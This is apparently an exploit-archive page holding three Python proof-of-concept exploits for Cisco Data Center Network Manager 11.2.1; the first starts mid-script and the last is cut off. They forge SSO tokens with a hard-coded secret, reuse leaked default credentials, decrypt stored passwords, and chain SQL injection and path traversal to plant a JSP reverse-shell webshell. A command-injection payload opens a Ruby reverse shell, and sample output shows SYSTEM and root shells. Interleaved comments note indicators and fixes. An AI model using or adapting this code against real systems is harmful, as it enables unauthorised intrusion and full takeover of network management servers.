r = requests.post(uri, data=d, headers=h, verify=False)
# A body that is not JSON counts as a failed attempt.
try:
json = r.json()
except ValueError:
return False
# The module-level flag records which of the two accepted answers came back.
if json["resultMessage"] == "Success":
user_added_already = False
return True
elif json["resultMessage"] == "User already exists.":
user_added_already = True
return True
return False

def leak_time(target):
""" leak the time from the server (not really needed) """
# Reads the Date response header of the site root, drops its last four
# characters (presumably the " GMT" suffix) and returns the value as an
# integer epoch timestamp computed with calendar.timegm().
uri = "https://%s/" % target
r = requests.get(uri, verify=False)
r_time = datetime.strptime(r.headers['Date'][:-4], '%a, %d %b %Y %H:%M:%S')
return calendar.timegm(r_time.timetuple())

def gen_token(target, usr, pwd):
""" this authenticates via the SOAP endpoint """
# Sends a requestToken call to LogonWS with the given credentials and an
# expiration of 100000, then returns the text of the first <return> element
# in the response, or False when none is present.
# usr and pwd are interpolated into the XML without escaping.
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.jaxws.dcbu.cisco.com/">'
soap_body += '\t<soapenv:Header/>'
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:requestToken>'
soap_body += '\t\t\t<username>%s</username>' % usr
soap_body += '\t\t\t<password>%s</password>' % pwd
soap_body += '\t\t\t<expiration>100000</expiration>'
soap_body += '\t\t</ep:requestToken>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/LogonWSService/LogonWS" % target
r = requests.post(uri, data=soap_body, verify=False)
tree = ElementTree.fromstring(r.content)
for elem in tree.iter():
if elem.tag == "return":
return elem.text
return False

def craft_soap_header(target, usr, pwd):
""" this generates the soap header """
# Builds a SOAP header whose <m:token> element holds a fresh token from
# gen_token(); every call therefore performs one logon request.
soap_header = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
soap_header += '<m:token xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:token>' % gen_token(target, usr, pwd)
soap_header += '\t</SOAP-ENV:Header>'
return soap_header

def load_remote_class(target, smb, usr, pwd):
""" this triggers the cmdi """
# Calls the SanWS importTS operation with a certFile value that starts with a
# double quote and continues with extra command-line options. Returns True
# when the response contains a resultMessage of "Success".
# Defender view: the value shows certFile being placed inside a quoted
# command-line argument without validation, so a quote ends the argument and
# the rest is read as options. NOTE(review): the command that consumes
# certFile is not shown on this page. The injected options point at a UNC
# path, so outbound SMB from the management server to unfamiliar hosts is a
# network-level indicator, and blocking it limits the impact.
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header(target, usr, pwd)
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:importTS>'
soap_body += '\t\t\t<certFile>" -providerclass Si -providerpath "%s</certFile>' % smb
soap_body += '\t\t\t<serverIPAddress></serverIPAddress>'
soap_body += '\t\t</ep:importTS>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/SanWSService/SanWS" % target
r = requests.post(uri, data=soap_body, verify=False)
tree = ElementTree.fromstring(r.content)
for elem in tree.iter():
if elem.tag == "resultMessage":
if elem.text == "Success":
return True
return False

def handler(lp):
# Listens on TCP port lp on all interfaces, accepts a single connection and
# attaches it to a telnetlib session for interactive use.
print "(+) starting handler on port %d" % lp
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
# The accepted socket is assigned directly as the Telnet object's socket.
t.sock = conn
print "(+) pop thy shell!"
t.interact()

def exec_code(t, lp, s, usr, pwd):
# Starts handler(lp) in a background thread, then issues the importTS
# request through load_remote_class(); the return value of that call is
# not checked.
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
load_remote_class(t, s, usr, pwd)

def main():
# Entry point: parses the four command-line arguments, repeats the token
# step until bypass_auth() succeeds, then calls exec_code().
# Defender view: the account name and password below are fixed in this PoC,
# so a "hacker" global-admin account on an appliance is a direct indicator
# that this script (or a copy of it) was run against it.
usr = "hacker"
pwd = "Hacked123"
if len(sys.argv) != 5:
print "(+) usage: %s <target> <connectback:port> <smbserver> <smbpath>" % sys.argv[0]
print "(+) eg: %s 192.168.100.122 192.168.100.159:1337 vmware-host '\\Shared Folders\\tools'" % sys.argv[0]
sys.exit(1)
t = sys.argv[1]
c = sys.argv[2]
# UNC path assembled from the server and path arguments.
s = "\\\\%s%s" % (sys.argv[3], sys.argv[4])
i = 0

# Split host:port, falling back to port 4444 when no port is given.
if not ":" in c:
print "(+) using default connectback port 4444"
ls = c
lp = 4444
else:
if not c.split(":")[1].isdigit():
print "(-) %s is not a port number!" % cb.split(":")[1]
sys.exit(-1)
ls = c.split(":")[0]
lp = int(c.split(":")[1])

# InheritableThreadLocal.childValue performs a 'shallow copy' and causes a small race condition
# The loop below retries with a fresh token on every pass until the server
# accepts one; repeated addUser requests in quick succession are therefore
# visible in the access log.
while 1:
i += 1
print "(+) attempting auth bypass %d" % i
raw = make_raw_token(t)
cryptor = AESCipher()
token = cryptor.encrypt(raw)
if bypass_auth(t, token, usr, pwd):
if not user_added_already:
print "(+) bypassed auth! added a global admin %s:%s" % (usr, pwd)
else:
print "(+) we probably already bypassed auth! try the account %s:%s" % (usr, pwd)
break
# ANSI escapes: move the cursor up one line and clear it, so the attempt
# counter is overwritten in place.
sys.stdout.write('\x1b[1A')
sys.stdout.write('\x1b[2K')

# we have bypassed the authentication at this point
print "(+) attempting to load class from %s\\Si.class" % s
exec_code(t, lp, s, usr, pwd)

if __name__ == "__main__":
main()

Cisco Data Center Network Manager 11.2.1 SQL Injection


Cisco Data Center Network Manager version 11.2.1 suffers from a remote SQL injection vulnerability.


MD5 | e52727f67ec73f54a1870891d9e11891

#!/usr/bin/python
"""
Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability

Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5

Bug 1: CVE-2019-15976 / ZDI-20-008
Bug 2: CVE-2019-15984 / ZDI-20-060

Example:
========

saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback>
(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337

saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
(+) created the account hacker:Hacked123
(+) created the 1337/custom path!
(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c
(+) SQL Injection working!
(+) wrote the si.jsp shell!
(+) cleaned up the database!
(+) starting handler on port 1337
(+) connection from 192.168.100.122
(+) pop thy shell!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
whoami
nt authority\system

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>

Clean Up:
=========

1. delete from xmlDocs where user_name = '1337';
2. delete si.jsp from the web root
3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337
"""

import re
import md5
import sys
import time
import socket
import base64
import requests
import telnetlib
from threading import Thread
from xml.etree import ElementTree
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def _get_jsp(cbh, cbp):
""" Return the JSP source used by this PoC, with the host cbh and port cbp substituted in.

Defender view: the page deletes the report files under
C:/Program Files/Cisco Systems/dcm/fm/reports/1337/ and then its own file,
so their absence does not show the host is clean; the web server's process
creation and outbound connection records are the more durable evidence.
"""
jsp = """
<%%@page import="java.lang.*"%%>
<%%@page import="java.util.*"%%>
<%%@page import="java.io.*"%%>
<%%@page import="java.net.*"%%>

<%%
// clean up
String[] files = {
"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml",
"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/",
"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/",
};
for (String s:files){ File f = new File(s); f.delete(); }
File f = new File(application.getRealPath("/" + this.getClass().getSimpleName().replaceFirst("_",".")));
f.delete();
class StreamConnector extends Thread
{
InputStream we;
OutputStream uo;

StreamConnector( InputStream we, OutputStream uo )
{
this.we = we;
this.uo = uo;
}

public void run()
{
BufferedReader dy = null;
BufferedWriter zvi = null;
try
{
dy = new BufferedReader( new InputStreamReader( this.we ) );
zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );
char buffer[] = new char[8192];
int length;
while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )
{
zvi.write( buffer, 0, length );
zvi.flush();
}
} catch( Exception e ){}
try
{
if( dy != null )
dy.close();
if( zvi != null )
zvi.close();
} catch( Exception e ){}
}
}

try
{
String ShellPath;
ShellPath = new String("cmd.exe");
Socket socket = new Socket( "%s", %s);
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%%>
""" % (cbh, cbp)
return jsp

def get_session(target, user, password):
""" we have bypassed auth at this point and created an admin """
# Logs in through the form endpoint without following redirects and pulls
# the JSESSIONID and resttoken values out of the Set-Cookie header.
# Returns a cookie dict, or False when the header is missing or the pattern
# does not match.
d = {
"j_username" : user,
"j_password" : password
}
uri = "https://%s/j_spring_security_check" % target
r = requests.post(uri, data=d, verify=False, allow_redirects=False)
if "Set-Cookie" in r.headers:
# The pattern expects a 56-character session id and a resttoken made of up
# to four digits, a colon and 44 further characters.
match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,4}:.{44});", r.headers["Set-Cookie"])
if match:
sessionid = match.group(1)
resttoken = match.group(2)
return { "JSESSIONID" : sessionid, "resttoken": resttoken}
return False

def craft_soap_header():
# Builds the SOAP header used by every request in this script; its
# <m:ssoToken> element carries the value returned by gen_ssotoken().
soap_header = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
soap_header += '<m:ssoToken xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:ssoToken>' % gen_ssotoken()
soap_header += '\t</SOAP-ENV:Header>'
return soap_header

def we_can_trigger_folder_path_creation(target):
""" craft the path location and db entry for the traversal """
# Saves a report template named "si" for user name "1337" through ReportWS
# and returns True on HTTP 200.
# Defender view: per the Clean Up notes in the header, this leaves a
# reports/1337 folder on disk and xmlDocs rows with user_name '1337'.
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header()
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:saveReportTemplate>'
soap_body += '\t\t\t<reportTemplateName>si</reportTemplateName>'
soap_body += '\t\t\t<userName>1337</userName>'
soap_body += '\t\t\t<updatedAttrs></updatedAttrs>'
soap_body += '\t\t\t<pmInterval>1337</pmInterval>'
soap_body += '\t\t</ep:saveReportTemplate>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/ReportWSService/ReportWS" % target
r = requests.post(uri, data=soap_body, verify=False)
if r.status_code == 200:
return True
return False

def we_can_trigger_second_order_write(target, shellpath):
""" trigger the traversal """
# Calls openReportTemplate with shellpath as the template name and returns
# True on HTTP 200.
# Defender view: the caller passes a name containing "../" segments, so the
# template name is evidently used to build a file path without being
# canonicalised. The fix belongs on the server: resolve the path and reject
# anything that leaves the reports directory.
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header()
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:openReportTemplate>'
soap_body += '\t\t\t<reportTemplateName>%s</reportTemplateName>' % shellpath
soap_body += '\t\t\t<userName>1337</userName>'
soap_body += '\t\t</ep:openReportTemplate>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/ReportWSService/ReportWS" % target
r = requests.post(uri, data=soap_body, verify=False)
if r.status_code == 200:
return True
return False

def gen_ssotoken():
""" auth bypass """
# Builds an ssoToken of the form "sessionid.timestamp.base64(md5(...)).username",
# where the MD5 input is username + sessionid + timestamp + a fixed string.
# Defender view: the only secret in the digest is a constant that is the same
# everywhere, so the token proves nothing about the caller. A sound design
# uses a per-installation random key with an HMAC and checks that the session
# exists and has not expired. The literal values below (sessionid 1337,
# timestamp 9999999999999, user "hax") are searchable in request logs.
timestamp = 9999999999999 # we live forever
username = "hax" # doesnt even need to exist!
sessionid = 1337 # doesnt even need to exist!
d = "%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" % (username, sessionid, timestamp)
return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)

def we_can_trigger_sql_injection(target, sql):
""" stacked sqli primitive """
# Sends getVmHostData with the statement placed in the sortType field,
# wrapped as ";<sql>--", and returns True on HTTP 200.
# Defender view: sortType is a sort direction, so the server-side fix is an
# allow-list (ASC/DESC) rather than escaping; the database account used by
# the web tier should also not be able to run stacked UPDATE/DELETE
# statements on xmldocs from a read-only report query.
sqli = ";%s--" % sql
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header()
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:getVmHostData>'
soap_body += '\t\t\t<arg0>'
soap_body += '\t\t\t\t<sortField>vcluster</sortField>'
soap_body += '\t\t\t\t<sortType>%s</sortType>' % sqli
soap_body += '\t\t\t</arg0>'
soap_body += '\t\t\t<arg1></arg1>'
soap_body += '\t\t\t<arg2></arg2>'
soap_body += '\t\t\t<arg3>false</arg3>'
soap_body += '\t\t</ep:getVmHostData>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/DbInventoryWSService/DbInventoryWS" % target
r = requests.post(uri, data=soap_body, verify=False)
if r.status_code == 200:
return True
return False

def we_can_leak_vfs(target):
""" we use a information disclosure for the vfs path """
# Requests the server-info page with HTTP Basic authentication using a fixed
# username and password, then stores the temp/content directory name found
# in the response in the module-level variable vfs. Returns True on a match.
# NOTE(review): the page does not say where these credentials come from; if
# they ship with the product they must be treated as public, and access to
# /serverinfo should be restricted at the network or proxy layer.
global vfs
uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')
r = requests.get(uri, verify=False, auth=c)
match = re.search(r"temp\\(.{21}content-.{15,16})", r.text)
if match:
# Backslashes in the reported path are converted to forward slashes.
vfs = str(match.group(1).replace("\\","/"))
return True
return False

def handler(lp):
""" this is the client handler, to catch the connectback """
# Listens on TCP port lp on all interfaces, accepts a single connection and
# attaches it to a telnetlib session for interactive use.
print "(+) starting handler on port %d" % lp
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
# The accepted socket is assigned directly as the Telnet object's socket.
t.sock = conn
print "(+) pop thy shell!"
t.interact()

def exec_code(t, usr, pwd, cbp):
""" this function threads the client handler and sends off the attacking payload """
# Starts handler() on port cbp in a background thread, then requests /si.jsp
# with the cookies from get_session(); the response is not inspected.
# Defender view: an authenticated GET for a JSP at the web root that is not
# part of the product is the request to look for in the access log.
handlerthr = Thread(target=handler, args=(int(cbp),))
handlerthr.start()
r = requests.get("https://%s/si.jsp" % t, cookies=get_session(t, usr, pwd), verify=False)

def we_can_add_user(target, usr, pwd):
""" add a user so that we can reach our backdoor! """
# Calls the DbAdminWS addUser operation with the global-admin role and
# password expiration disabled. Returns True when resultMessage is "Success"
# or "User already exists.", otherwise False.
# Defender view: the request is authorised only by the forged ssoToken
# header, so any global-admin account created through DbAdminWS without a
# matching interactive admin session deserves investigation.
soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
soap_body += craft_soap_header()
soap_body += '\t<soapenv:Body>'
soap_body += '\t\t<ep:addUser>'
soap_body += '\t\t\t<userName>%s</userName>' % usr
soap_body += '\t\t\t<password>%s</password>' % pwd
soap_body += '\t\t\t<roleName>global-admin</roleName>'
soap_body += '\t\t\t<enablePwdExpiration>false</enablePwdExpiration>'
soap_body += '\t\t</ep:addUser>'
soap_body += '\t</soapenv:Body>'
soap_body += '</soapenv:Envelope>'
uri = "https://%s/DbAdminWSService/DbAdminWS" % target
r = requests.post(uri, data=soap_body, verify=False)
tree = ElementTree.fromstring(r.content)
for elem in tree.iter():
if elem.tag == "resultMessage":
res = elem.text
if res == "Success":
return True
elif res == "User already exists.":
return True
return False

def main():
    """Parse <target> and <connectback>, then run the seven stages in order.

    Exits with status 1 and a usage message unless exactly two arguments are
    given. <connectback> must be host:port; it is split on ":" with no
    validation of either part.

    Defender notes: the fixed account name and password below, the '1337'
    value in xmldocs.user_name and the file name si.jsp are indicators that
    can be searched for. Stage 6 deletes only the xmldocs rows; nothing in
    this function removes the added account or the written si.jsp file.
    """

    usr = "hacker"
    pwd = "Hacked123"

    if len(sys.argv) != 3:
        print "(+) usage: %s <target> <connectback>" % sys.argv[0]
        print "(+) eg: %s 192.168.100.122 192.168.100.59:1337" % sys.argv[0]
        sys.exit(1)

    t = sys.argv[1]
    c = sys.argv[2]

    cbh = c.split(":")[0]
    cbp = c.split(":")[1]
    # _get_jsp() is defined elsewhere in the file; its output is hex-encoded
    # (Python 2 str.encode("hex")) so it can be embedded in the SQL of stage 4.
    sc = _get_jsp(cbh, cbp).encode("hex")

    # NOTE(review): the listing carries no indentation; the nesting below is
    # reconstructed from data flow (each stage uses results of the previous
    # one) and should be confirmed against the original file.

    # stage 1 - add a user
    if we_can_add_user(t, usr, pwd):
        print "(+) created the account %s:%s" % (usr, pwd)

        # stage 2 - trigger folder creation and db entry
        if we_can_trigger_folder_path_creation(t):
            print "(+) created the 1337/custom path!"

            # stage 3 - leak the vfs path (not really required I suppose)
            if we_can_leak_vfs(t):
                print "(+) leaked vfs! %s" % vfs

                # stage 4 - trigger the sql injection to update our template entry
                # The document name is a relative path that climbs out of its
                # storage directory into the application server's VFS temp tree.
                sp = "../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp" % vfs
                sql = "update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';" % (sp, sc)
                if we_can_trigger_sql_injection(t, sql):
                    print "(+) SQL Injection working!"

                    # stage 5 - trigger the shell write
                    if we_can_trigger_second_order_write(t, sp):
                        print "(+) wrote the si.jsp shell!"

                        # stage 6 - cleanup
                        sql = "delete from xmldocs where user_name='1337';"
                        if we_can_trigger_sql_injection(t, sql):
                            print "(+) cleaned up the database!"

                        # stage 7 - go get some rce
                        exec_code(t, usr, pwd, cbp)

# Run the staged sequence only when the file is executed as a script.
if __name__ == "__main__":
    main()


Cisco Data Center Network Manager 11.2.1 Command Injection


Cisco Data Center Network Manager version 11.2.1 remote command injection exploit.


MD5 | f78d9a450e8dddba0757fc613e10da7a

#!/usr/bin/python
"""
Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability

Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers
- Release: 11.2(1)
- Release Date: 05-Jun-2019
- FileName: dcnm-va.11.2.1.iso.zip
- Size: 4473.54 MB (4690850167 bytes)
- MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb

Bug 1: CVE-2019-15977 / ZDI-20-012
Bug 2: CVE-2019-15977 / ZDI-20-013
Bug 3: CVE-2019-15978 / ZDI-20-102

Example:
========

saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.100.123 192.168.100.59
(+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337

saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.59:1337
(+) leaked user: root
(+) leaked pass: Dcnmpass123
(+) leaked vfs path: temp18206a94b7c45072/content-85ba056e1faec012
(+) created a root session!
(+) starting handler on port 1337
(+) connection from 192.168.100.123
(+) pop thy shell!
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux localhost 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
"""

import re
import sys
import random
import socket
import string
import requests
import telnetlib
from threading import Thread
from Crypto.Cipher import Blowfish
from requests.auth import HTTPBasicAuth
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silences urllib3's warning about unverified HTTPS requests. Every request in
# this script is sent with verify=False, so server certificates are never checked.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def handler(lp):
    """Accept one inbound TCP connection on port ``lp`` and open a console on it.

    lp -- local TCP port number to listen on.

    Binds to all interfaces (0.0.0.0), blocks in accept() until a peer
    connects, then drives the socket through telnetlib's interact() loop.

    Defender notes: on the target this corresponds to an outbound TCP
    connection from the server to an external host and port. Egress filtering
    and alerting on outbound connections from management appliances cover it.
    """
    print "(+) starting handler on port %d" % lp
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Listens on every local interface.
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print "(+) connection from %s" % addr[0]
    # The Telnet object serves only as an interactive wrapper around the socket.
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()

def exec_code(t, lp, s):
    """Start the listener thread and request path ``s`` on host ``t``.

    t  -- target host placed into the URL.
    lp -- listener port passed to handler().
    s  -- URL path to request, relative to the server root.

    Sends the module-level ``sessionid`` (set by we_can_login) as the
    JSESSIONID cookie. The response is stored in ``r`` and not inspected.
    main() in this listing does not call this function.
    """
    handlerthr = Thread(target=handler, args=(lp,))
    handlerthr.start()
    c = { "JSESSIONID" : sessionid }
    r = requests.get("https://%s/%s" % (t, s), cookies=c, verify=False)

def random_string(string_length = 8):
    """Return ``string_length`` lowercase ASCII letters chosen at random.

    Uses the ``random`` module, which is not a cryptographic generator; the
    result is suitable as a throwaway label, not as a secret.
    """
    alphabet = string.ascii_lowercase
    picked = []
    for _ in range(string_length):
        picked.append(random.choice(alphabet))
    return ''.join(picked)

def decrypt(key):
    """Decrypt a hex-encoded value with Blowfish in ECB mode and a fixed key.

    key -- hex string (Python 2 str.decode("hex")) holding the ciphertext;
           despite the parameter name, this is the data, not the cipher key.
    Returns the raw decrypted bytes, including any padding; main() strips
    non-printable characters afterwards.

    Defender notes: the cipher key is a constant string in this script. If the
    product protects stored passwords with that same constant, which is what
    this script relies on, the '#'-prefixed values shown on the server-info
    page are equivalent to plaintext. Treat any disclosure of them as a
    credential leak and rotate the affected passwords.
    """
    cipher = Blowfish.new("jaas is the way", Blowfish.MODE_ECB)
    msg = cipher.decrypt(key.decode("hex"))
    return msg

def we_can_leak(target):
    """Scrape configuration values from the server-info page.

    Requests /serverinfo/HtmlAdaptor?action=displayServerInfos with the HTTP
    Basic credential pair hard-coded below and pulls six values out of the
    response text into module-level globals: dbuser, dbpass, jdbc, vfspth,
    rootuser and rootpass.

    target -- host placed into the URL.
    Returns True only when all six values were found, False otherwise.

    In this listing only rootuser, rootpass and vfspth are used afterwards;
    the database values are collected but not used.

    Defender notes: a page that lists database and SFTP credentials behind a
    fixed login is the root of the chain. Block or remove access to it, apply
    the vendor fix for the CVEs named in the file header, and rotate every
    credential the page exposes if it was reachable.
    """
    global dbuser, dbpass, vfspth, jdbc, rootuser, rootpass
    dbuser = None
    dbpass = None
    vfspth = None
    rootuser = None
    rootpass = None
    jdbc = None
    uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
    # Static credentials; TLS certificate validation is disabled.
    c = HTTPBasicAuth('admin', 'nbv_12345')
    r = requests.get(uri, verify=False, auth=c)
    leaked = r.text
    # The patterns are not raw strings and "." is unescaped, so it matches any
    # character; each (.*) captures the rest of the line.
    # Password values are matched after a leading '#' marker.
    match = re.search("db.password = #(.*)", leaked)
    if match:
        dbpass = match.group(1)
    match = re.search("db.user = (.*)", leaked)
    if match:
        dbuser = match.group(1)
    match = re.search("dcnmweb = (.*)", leaked)
    if match:
        vfspth = match.group(1)
    match = re.search("db.url = (.*)", leaked)
    if match:
        jdbc = match.group(1)
    match = re.search("server.sftp.password = #(.*)", leaked)
    if match:
        rootpass = match.group(1)
    match = re.search("server.sftp.username = (.*)", leaked)
    if match:
        rootuser = match.group(1)
    if dbuser and dbpass and vfspth and jdbc and rootuser and rootpass:
        return True
    return False

def we_can_login(target, password):
    """Log in to the web UI with the scraped user name and the given password.

    target   -- host placed into the URL.
    password -- plaintext password (main() passes the decrypted SFTP password).

    Posts j_username/j_password to /j_spring_security_check without following
    redirects. When the Set-Cookie header carries both a 56-character
    JSESSIONID and a resttoken, stores them in the module-level ``sessionid``
    and ``resttoken`` and returns True. Returns False otherwise.

    Defender notes: the login succeeds because the account whose password is
    shown on the server-info page is also accepted by the web UI. Use distinct
    credentials per service, and review web logins for that account from
    unexpected addresses.
    """
    global sessionid, resttoken
    d = {
        "j_username" : rootuser,
        "j_password" : password,
    }
    uri = "https://%s/j_spring_security_check" % target
    r = requests.post(uri, data=d, verify=False, allow_redirects=False)
    if "Set-Cookie" in r.headers:
        # Both cookies must appear in the combined header, in this order.
        match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,3}:.{44});", r.headers["Set-Cookie"])
        if match:
            sessionid = match.group(1)
            resttoken = match.group(2)
            return True
    return False

def pop_a_root_shell(t, ls, lp):
    """Start the listener thread and POST a fabric definition to /rest/fabrics.

    t  -- target host placed into the URL.
    ls -- connect-back host written into the "name" field.
    lp -- connect-back port (int); also the port handler() listens on.

    The "name" field of the JSON body carries shell metacharacters; the other
    fields are filler so the request passes validation (see the inline comment
    below). Authenticates with the module-level ``resttoken`` cookie set by
    we_can_login(). Returns True when the reply is HTTP 200 and contains
    ``ls``, False otherwise.

    Defender notes: the file header names the flaw as a command injection in
    LanFabricImpl createLanFabric, so the fabric name evidently reaches a shell
    command unsanitised. Server-side, names should be validated against a
    strict allowlist and passed to external programs as argument vectors,
    never through a shell. For detection, look for POST /rest/fabrics bodies
    whose "name" contains quotes, backticks, braces or semicolons.
    """
    handlerthr = Thread(target=handler, args=(lp,))
    handlerthr.start()
    uri = "https://%s/rest/fabrics" % t
    # Random prefix, then a quote that closes the string the name is embedded in.
    cmdi = "%s\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"%s\",\"%d\");" % (random_string(), ls, lp)
    cmdi += "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\""
    j = {
        "name" : cmdi,

        # this is needed to pass validate() on line 149 of the LanFabricImpl class
        "generalSetting" : {
            "asn" : "1337",
            "provisionOption" : "Manual"
        },
        "provisionSetting" : {
            "dhcpSetting": {
                "primarySubnet" : "127.0.0.1",
                "primaryDNS" : "127.0.0.1",
                "secondaryDNS" : "127.0.0.1"
            },
            "ldapSetting" : {
                "server" : "127.0.0.1"
            },
            "amqpSetting" : {
                "server" : "127.0.0.1:1337"
            }
        }
    }
    c = { "resttoken": resttoken }
    r = requests.post(uri, json=j, cookies=c, verify=False)
    if r.status_code == 200 and ls in r.text:
        return True
    return False

def main():
    """Parse <target> and <connectback[:port]>, then run the three stages.

    Exits with status 1 and a usage message unless exactly two arguments are
    given, and with status -1 when the part after ":" is not all digits. The
    connect-back port defaults to 4444 when no ":" is present.

    Defender notes: the chain is credential disclosure (stage 1), a web login
    with the disclosed account (stage 2) and a command injection in fabric
    creation (stage 3). Removing the first link, the server-info page behind
    a fixed login, stops this script at stage 1. Note that stage 1 prints the
    recovered password in clear text to the operator's terminal.
    """
    if len(sys.argv) != 3:
        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
        print "(+) eg: %s 192.168.100.123 192.168.100.59" % sys.argv[0]
        print "(+) eg: %s 192.168.100.123 192.168.100.59:1337" % sys.argv[0]
        sys.exit(1)
    t = sys.argv[1]
    cb = sys.argv[2]
    if not ":" in cb:
        print "(+) using default connectback port 4444"
        ls = cb
        lp = 4444
    else:
        if not cb.split(":")[1].isdigit():
            print "(-) %s is not a port number!" % cb.split(":")[1]
            sys.exit(-1)
        ls = cb.split(":")[0]
        lp = int(cb.split(":")[1])

    # stage 1 - leak the creds
    if we_can_leak(t):
        # Decrypt the SFTP password and drop bytes outside 0x20-0x7F, which
        # removes non-printable bytes left at the end of the decrypted block.
        pwd = re.sub(r'[^\x20-\x7F]+','', decrypt(rootpass))
        print "(+) leaked user: %s" % rootuser
        print "(+) leaked pass: %s" % pwd
        # Only path components from index 10 onward are printed.
